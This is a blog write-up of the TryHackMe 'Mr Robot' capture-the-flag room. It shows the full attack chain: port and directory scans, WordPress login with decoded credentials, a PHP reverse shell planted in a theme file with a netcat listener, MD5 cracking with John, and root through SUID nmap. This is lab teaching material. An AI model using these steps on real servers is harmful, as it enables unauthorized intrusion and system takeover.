DEV Community

Cover image for TryHackMe(THM)-Mrrobot Writeup
Ionut
Ionut

Posted on

TryHackMe(THM)-Mrrobot Writeup

Image description

Mr Robot CTF

Based on the Mr. Robot show, can you root this box?
Room link is here link

Image description
Can you root this Mr. Robot styled machine? This is a virtual machine meant for beginners/intermediate users. There are 3 hidden keys located on the machine, can you find them?

Let’s start the room with basic things.

PORT SCANNING:
Image description

Image description

nmap -sV -sC -A IP
Enter fullscreen mode Exit fullscreen mode
  1. Port 22 – SSH
  2. Port 80 – http
  3. Port 443 – ssl/http

Now, let's check out the webserver!

Image description
With the commands displayed here you can’t do anything which that would be help you.

If you haven’t seen the show yet, I recommend you do not try these commands, as they contain spoilers!

On this page we don’t have any information to help us, so I decided to do a gobuster scan ( directory search ).

Image description

gobuster dir -u IP -w /usr/share/wordlists/dirb/common.txt
Enter fullscreen mode Exit fullscreen mode

The first hint for the first question is “Robots”
And we have the directory “robots.txt”

Image description

Here is the first KEY!

Image description

From this point I've found 2 ways to find the next key:

  1. From the gobuster scan, we found a wordpress admin login page and on /robots.txt is a file “fsocity.dic” -> is a wordlist which we can use to bruteforce wordpress login page (This is a waste of time)

  2. There is another interesting directory -> /license

Image description

If we scroll down we find a string in base64

Image description

We can decode this on BASE64 DECODER

https://base64.guru/converter/decode/text
ZWxsaW90OkVSMjgtMDY1Mgo= --> elliot:ER28-0652
And easy, we have the credentials for wordpress:

Image description

Image description

Now the tricky part, and my favourite part of this room
We need to do a reverse shell:
First go to “Appearance” – “Editor” – “Archives”

Image description

At this step, we have to replace the code that comes up with the reverse php shell component that we can copy from Github.
PHP REVERSE SHELL

Image description

To connect to the shell you have to listen the port 4444 ( or the port you have chosen )
NETCAT

nc -lvnp 4444
Enter fullscreen mode Exit fullscreen mode

And go on IP/wp-content/themes/twentyfifteen/archive.php
to activate the shell.

Image description

Image description
Wohoo, we have a shell now.

I added:

echo "import pty; pty.spawn('/bin/bash')" > /tmp/anyname.py
python /tmp/anyname.py
Enter fullscreen mode Exit fullscreen mode

to have a stable shell.

The second key is in /home/robot/, but unfortunately we dont have permission to read this.

Image description

Luckily there is another file with the password for robot user.

Image description
To decrypt this hash we use JohnTheRipper.

echo 'c3fcd3d76192e4007dfb496cca67e13b' > anyfilename
john --format=raw-md5 --wordlist=rockyou.txt anyfilename
john --show --format=RAW-MD5 anyfilename

> ?: abcdefghijklmnopqrstuvwxyz (this is the password)
Enter fullscreen mode Exit fullscreen mode

Now, simply conenct as "robot".

su robot
-and the password is **abcdefghijklmnopqrstuvwxyz**
Enter fullscreen mode Exit fullscreen mode

Image description

Now it remains to find the last key that should be in root.
The hint is NMAP

I used

find / -perm -u=s -type f 2>/dev/null
Enter fullscreen mode Exit fullscreen mode

to find all files who have SUID bit set.

Image description
And yep, the nmap is here.

GTFOBINS is the best site in my opinion to find how to get root privilege access
LINK
These are the comamnds to obtain root access:

nmap --interactive
nmap> !sh
Enter fullscreen mode Exit fullscreen mode

Image description

Finally we found the final key!!!

It's a pretty old challenge, but a very good one. I hope you learned a lot from this writeup.
For any queries, feel free to drop a comment and follow me here for more ctf writeups.

Top comments (0)